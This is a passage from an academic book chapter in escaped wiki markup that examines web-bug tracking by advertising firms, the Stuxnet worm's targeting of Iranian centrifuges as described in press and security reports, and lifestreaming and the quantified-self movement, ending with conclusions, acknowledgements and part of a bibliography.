*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims 'an eye on 1091622 websites': an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
